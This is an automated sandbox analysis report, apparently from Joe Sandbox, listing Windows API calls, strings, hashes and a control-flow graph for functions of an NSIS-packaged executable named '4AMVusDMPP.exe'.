                                                          • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                          • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                          • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                          • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                          Control-flow Graph (function entry 00404DCC; graph rendering omitted)
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                          • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                          • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                          • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                          • GlobalFree.KERNEL32(?), ref: 004051FC
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                          • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                          • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                          • ShowWindow.USER32(00000000), ref: 004053AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                          • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                          • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                          • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                          Control-flow Graph (function entry 00405AFA; graph rendering omitted)
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B23
                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B6B
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B8E
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B94
                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405BA4
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                          • FindClose.KERNEL32(00000000), ref: 00405C53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-3984366992
                                                          • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                          • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                          • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                          • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                          • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00406736
                                                          • FindClose.KERNEL32(00000000), ref: 00406742
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: xgB
                                                          • API String ID: 2295610775-399326502
                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                          Control-flow Graph (rendered graph not reproduced; function 00403E86)
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                          • ShowWindow.USER32(?), ref: 00403EDF
                                                          • DestroyWindow.USER32 ref: 00403EF3
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                          • GetDlgItem.USER32(?,?), ref: 00403F30
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                          • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                          • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                          • ShowWindow.USER32(00000000,?), ref: 00404135
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                          • EnableWindow.USER32(?,?), ref: 00404162
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                          • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                          • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: (7B
                                                          • API String ID: 3282139019-3251261122
                                                          • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                          • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                          • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                          • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                          Control-flow Graph (rendered graph not reproduced; function 00403AD8)
                                                          APIs
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,00435000,00000000), ref: 00403B59
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                          • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                          • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                          • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-268981469
                                                          • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                          • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                          • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                          • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                          Control-flow Graph (rendered graph not reproduced; function 00402F30)
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402F44
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4AMVusDMPP.exe,00000400), ref: 00402F60
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\4AMVusDMPP.exe,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00402FA9
                                                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4AMVusDMPP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-4260203894
                                                          • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                          • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                          • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                          • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                          Control-flow Graph (rendered graph not reproduced; function 0040640A)
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                          • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                          • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1230650788
                                                          • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                          • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                          • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                          • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                          Control-flow Graph (rendered graph not reproduced; function 0040176F)
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp$C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll$Call
                                                          • API String ID: 1941528284-4035365529
                                                          • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                          • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                          • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                          • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                           Control-flow Graph
                                                          control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 713 4027dc-4027e4 711->713 714 40267e-40268d call 406348 711->714 713->707 714->713 717 402693 714->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->713 723 4026c4-4026c9 720->723 721->722 725 40273c-402747 call 405fbf 721->725 722->713 732 40275f 722->732 723->713 724 4026cf-4026dd 723->724 727 4026e3-4026f5 MultiByteToWideChar 724->727 728 402798-4027a4 call 40632f 724->728 725->713 725->722 731 4026f7-4026fa 727->731 727->732 728->709 735 4026fc-402707 731->735 737 402762-402765 732->737 735->737 739 402709-40272e SetFilePointer MultiByteToWideChar 735->739 737->728 738 402767-40276c 737->738 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->735 742 402730 739->742 744 4027ca-4027d6 SetFilePointer 740->744 745 4027af-4027b3 740->745 741->740 743 402775-402788 741->743 742->732 743->713 746 40278a-402790 743->746 744->713 747 4027b5-4027b9 745->747 748 4027bb-4027c8 745->748 746->718 749 402796 746->749 747->744 747->748 748->713 749->713
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                            • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                          • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                          • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                          • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

